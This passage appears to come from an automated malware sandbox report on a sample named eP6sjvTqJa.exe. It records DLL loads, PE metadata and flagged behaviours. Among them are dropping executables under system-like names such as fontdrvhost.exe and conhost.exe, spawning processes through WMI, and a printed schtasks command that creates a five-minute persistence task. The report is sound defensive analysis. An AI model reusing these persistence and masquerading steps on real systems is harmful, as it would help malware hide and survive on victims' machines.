                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeSection loaded: winmm.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeSection loaded: winmmbase.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeSection loaded: mmdevapi.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeSection loaded: devobj.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeSection loaded: ksuser.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeSection loaded: avrt.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeSection loaded: audioses.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeSection loaded: powrprof.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeSection loaded: umpdc.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeSection loaded: msacm32.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeSection loaded: midimap.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeSection loaded: dwrite.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeSection loaded: windowscodecs.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeSection loaded: dpapi.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeSection loaded: secur32.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeSection loaded: schannel.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeSection loaded: mscoree.dll
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeSection loaded: version.dll
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeSection loaded: uxtheme.dll
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeSection loaded: windows.storage.dll
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeSection loaded: wldp.dll
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeSection loaded: profapi.dll
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeSection loaded: cryptsp.dll
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeSection loaded: rsaenh.dll
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeSection loaded: cryptbase.dll
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeSection loaded: sspicli.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: mscoree.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: version.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: uxtheme.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: windows.storage.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: wldp.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: profapi.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: cryptsp.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: rsaenh.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: cryptbase.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: sspicli.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: mscoree.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: version.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: uxtheme.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: windows.storage.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: wldp.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: profapi.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: cryptsp.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: rsaenh.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: cryptbase.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                                    Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                                    Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                                    Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                                    Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                                    Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dll
                                    Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dll
                                    Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dll
                                    Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: mscoree.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: version.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: uxtheme.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: windows.storage.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: wldp.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: profapi.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: cryptsp.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: rsaenh.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: cryptbase.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: sspicli.dll
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                                    Source: Window RecorderWindow detected: More than 3 window changes detected
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeDirectory created: C:\Program Files\Internet Explorer\en-US\conhost.exeJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeDirectory created: C:\Program Files\Internet Explorer\en-US\088424020bedd6Jump to behavior
                                    Source: eP6sjvTqJa.exeStatic file information: File size 2317084 > 1048576
                                    Source: eP6sjvTqJa.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                    Source: eP6sjvTqJa.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                    Source: eP6sjvTqJa.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                                    Source: eP6sjvTqJa.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                    Source: eP6sjvTqJa.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                                    Source: eP6sjvTqJa.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                                    Source: eP6sjvTqJa.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                    Source: eP6sjvTqJa.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: eP6sjvTqJa.exe
                                    Source: eP6sjvTqJa.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                    Source: eP6sjvTqJa.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                    Source: eP6sjvTqJa.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                    Source: eP6sjvTqJa.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                    Source: eP6sjvTqJa.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                                    Data Obfuscation

                                    barindex
                                    Detected unpacking (creates a PE file in dynamic memory)
                                    Source: C:\Drivers\fontdrvhost.exeUnpacked PE file: 5.2.fontdrvhost.exe.2520000.7.unpack
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeFile created: C:\Drivers\__tmp_rar_sfx_access_check_4386765Jump to behavior
                                    Source: eP6sjvTqJa.exeStatic PE information: section name: .didat
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeCode function: 0_2_00B9F640 push ecx; ret 0_2_00B9F653
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeCode function: 0_2_00B9EB78 push eax; ret 0_2_00B9EB96
                                    Source: C:\Drivers\fontdrvhost.exeCode function: 5_2_00007FFD345553D6 push cs; ret 5_2_00007FFD345553D9
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeCode function: 24_2_00007FFD345600BD pushad ; iretd 24_2_00007FFD345600C1
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeCode function: 24_2_00007FFD345653D6 push cs; ret 24_2_00007FFD345653D9
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeCode function: 24_2_00007FFD34571DD4 push eax; iretd 24_2_00007FFD34571DD5
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeCode function: 24_2_00007FFD34577E87 pushad ; retf 24_2_00007FFD34577EBD
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeCode function: 24_2_00007FFD3459C470 push A735F181h; iretd 24_2_00007FFD3459C476
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeCode function: 24_2_00007FFD34A89614 push eax; ret 24_2_00007FFD34A89644
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeCode function: 24_2_00007FFD34A8967D push eax; ret 24_2_00007FFD34A89644
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeCode function: 25_2_00007FFD345600BD pushad ; iretd 25_2_00007FFD345600C1
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeCode function: 25_2_00007FFD345653D6 push cs; ret 25_2_00007FFD345653D9
                                    Source: C:\Drivers\fontdrvhost.exeCode function: 30_2_00007FFD34571DD4 push eax; iretd 30_2_00007FFD34571DD5
                                    Source: C:\Drivers\fontdrvhost.exeCode function: 30_2_00007FFD34577E87 pushad ; retf 30_2_00007FFD34577EBD
                                    Source: C:\Drivers\fontdrvhost.exeCode function: 30_2_00007FFD345600BD pushad ; iretd 30_2_00007FFD345600C1
                                    Source: C:\Drivers\fontdrvhost.exeCode function: 30_2_00007FFD345653D6 push cs; ret 30_2_00007FFD345653D9
                                    Source: C:\Drivers\fontdrvhost.exeCode function: 30_2_00007FFD3459C470 push A735F181h; iretd 30_2_00007FFD3459C476
                                    Source: C:\Drivers\fontdrvhost.exeCode function: 31_2_00007FFD345700BD pushad ; iretd 31_2_00007FFD345700C1
                                    Source: C:\Drivers\fontdrvhost.exeCode function: 31_2_00007FFD345753D6 push cs; ret 31_2_00007FFD345753D9
                                    Source: C:\Drivers\fontdrvhost.exeCode function: 31_2_00007FFD34581DD4 push eax; iretd 31_2_00007FFD34581DD5
                                    Source: C:\Drivers\fontdrvhost.exeCode function: 31_2_00007FFD34587E87 pushad ; retf 31_2_00007FFD34587EBD
                                    Source: C:\Drivers\fontdrvhost.exeCode function: 31_2_00007FFD345AC470 push A735F181h; iretd 31_2_00007FFD345AC476
                                    Source: C:\Drivers\fontdrvhost.exeCode function: 40_2_00007FFD34581DD4 push eax; iretd 40_2_00007FFD34581DD5
                                    Source: C:\Drivers\fontdrvhost.exeCode function: 40_2_00007FFD34587E87 pushad ; retf 40_2_00007FFD34587EBD
                                    Source: C:\Drivers\fontdrvhost.exeCode function: 40_2_00007FFD345700BD pushad ; iretd 40_2_00007FFD345700C1
                                    Source: C:\Drivers\fontdrvhost.exeCode function: 40_2_00007FFD345753D6 push cs; ret 40_2_00007FFD345753D9
                                    Source: C:\Drivers\fontdrvhost.exeCode function: 40_2_00007FFD345AC470 push A735F181h; iretd 40_2_00007FFD345AC476
                                    Source: fontdrvhost.exe.0.drStatic PE information: section name: .text entropy: 7.56712127893692
                                    Source: AdbXCBUViTnoVBSsOq.exe.5.drStatic PE information: section name: .text entropy: 7.56712127893692
                                    Source: backgroundTaskHost.exe.5.drStatic PE information: section name: .text entropy: 7.56712127893692
                                    Source: AdbXCBUViTnoVBSsOq.exe0.5.drStatic PE information: section name: .text entropy: 7.56712127893692
                                    Source: conhost.exe.5.drStatic PE information: section name: .text entropy: 7.56712127893692
                                    Source: AdbXCBUViTnoVBSsOq.exe1.5.drStatic PE information: section name: .text entropy: 7.56712127893692

                                    Persistence and Installation Behavior

                                    barindex
                                    Creates processes via WMI
                                    Source: C:\Drivers\fontdrvhost.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Drivers\fontdrvhost.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Drivers\fontdrvhost.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Drivers\fontdrvhost.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Drivers\fontdrvhost.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Drivers\fontdrvhost.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Drivers\fontdrvhost.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Drivers\fontdrvhost.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Drivers\fontdrvhost.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Drivers\fontdrvhost.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Drivers\fontdrvhost.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Drivers\fontdrvhost.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Drivers\fontdrvhost.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Drivers\fontdrvhost.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Drivers\fontdrvhost.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Drivers\fontdrvhost.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Drivers\fontdrvhost.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Drivers\fontdrvhost.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Drops executable to a common third party application directory
                                    Source: C:\Drivers\fontdrvhost.exeFile written: C:\Program Files\Internet Explorer\en-US\conhost.exeJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeFile created: C:\Program Files\Internet Explorer\en-US\conhost.exeJump to dropped file
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeFile created: C:\Users\user\Desktop\PjHeJXVW.logJump to dropped file
                                    Source: C:\Drivers\fontdrvhost.exeFile created: C:\Users\user\Desktop\OwXMDaSq.logJump to dropped file
                                    Source: C:\Drivers\fontdrvhost.exeFile created: C:\Users\user\Desktop\beESemrN.logJump to dropped file
                                    Source: C:\Drivers\fontdrvhost.exeFile created: C:\Windows\IME\IMEKR\AdbXCBUViTnoVBSsOq.exeJump to dropped file
                                    Source: C:\Drivers\fontdrvhost.exeFile created: C:\Users\Default\AppData\Local\Microsoft\Windows\History\AdbXCBUViTnoVBSsOq.exeJump to dropped file
                                    Source: C:\Drivers\fontdrvhost.exeFile created: C:\Users\user\Desktop\lNXiOOwv.logJump to dropped file
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeFile created: C:\Users\user\Desktop\UXZdmUkL.logJump to dropped file
                                    Source: C:\Drivers\fontdrvhost.exeFile created: C:\Users\user\Desktop\SvkCuJlg.logJump to dropped file
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeFile created: C:\Users\user\Desktop\rfCzNWvT.logJump to dropped file
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeFile created: C:\Users\user\Desktop\LtQnCbUd.logJump to dropped file
                                    Source: C:\Drivers\fontdrvhost.exeFile created: C:\Users\user\Desktop\BoUXaXGR.logJump to dropped file
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeFile created: C:\Users\user\Desktop\crKSmbgv.logJump to dropped file
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeFile created: C:\Users\user\Desktop\uNJXqjUH.logJump to dropped file
                                    Source: C:\Drivers\fontdrvhost.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeJump to dropped file
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeFile created: C:\Drivers\fontdrvhost.exeJump to dropped file
                                    Source: C:\Drivers\fontdrvhost.exeFile created: C:\Users\user\Desktop\rFAHquBj.logJump to dropped file
                                    Source: C:\Drivers\fontdrvhost.exeFile created: C:\Users\user\Desktop\JRcNKQWy.logJump to dropped file
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeFile created: C:\Users\user\Desktop\rWShinUN.logJump to dropped file
                                    Source: C:\Drivers\fontdrvhost.exeFile created: C:\Users\user\backgroundTaskHost.exeJump to dropped file
                                    Source: C:\Drivers\fontdrvhost.exeFile created: C:\Users\user\backgroundTaskHost.exeJump to dropped file
                                    Source: C:\Drivers\fontdrvhost.exeFile created: C:\Windows\IME\IMEKR\AdbXCBUViTnoVBSsOq.exeJump to dropped file
                                    Source: C:\Drivers\fontdrvhost.exeFile created: C:\Users\user\Desktop\BoUXaXGR.logJump to dropped file
                                    Source: C:\Drivers\fontdrvhost.exeFile created: C:\Users\user\Desktop\rFAHquBj.logJump to dropped file
                                    Source: C:\Drivers\fontdrvhost.exeFile created: C:\Users\user\Desktop\OwXMDaSq.logJump to dropped file
                                    Source: C:\Drivers\fontdrvhost.exeFile created: C:\Users\user\Desktop\lNXiOOwv.logJump to dropped file
                                    Source: C:\Drivers\fontdrvhost.exeFile created: C:\Users\user\Desktop\beESemrN.logJump to dropped file
                                    Source: C:\Drivers\fontdrvhost.exeFile created: C:\Users\user\Desktop\SvkCuJlg.logJump to dropped file
                                    Source: C:\Drivers\fontdrvhost.exeFile created: C:\Users\user\Desktop\JRcNKQWy.logJump to dropped file
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeFile created: C:\Users\user\Desktop\crKSmbgv.logJump to dropped file
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeFile created: C:\Users\user\Desktop\rfCzNWvT.logJump to dropped file
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeFile created: C:\Users\user\Desktop\PjHeJXVW.logJump to dropped file
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeFile created: C:\Users\user\Desktop\uNJXqjUH.logJump to dropped file
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeFile created: C:\Users\user\Desktop\UXZdmUkL.logJump to dropped file
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeFile created: C:\Users\user\Desktop\LtQnCbUd.logJump to dropped file
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeFile created: C:\Users\user\Desktop\rWShinUN.logJump to dropped file

                                    Boot Survival

                                    barindex
                                    Drops PE files to the user root directory
                                    Source: C:\Drivers\fontdrvhost.exeFile created: C:\Users\user\backgroundTaskHost.exeJump to dropped file
                                    Uses schtasks.exe or at.exe to add and modify task schedules
                                    Source: C:\Drivers\fontdrvhost.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "AdbXCBUViTnoVBSsOqA" /sc MINUTE /mo 5 /tr "'C:\Windows\IME\IMEKR\AdbXCBUViTnoVBSsOq.exe'" /f
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
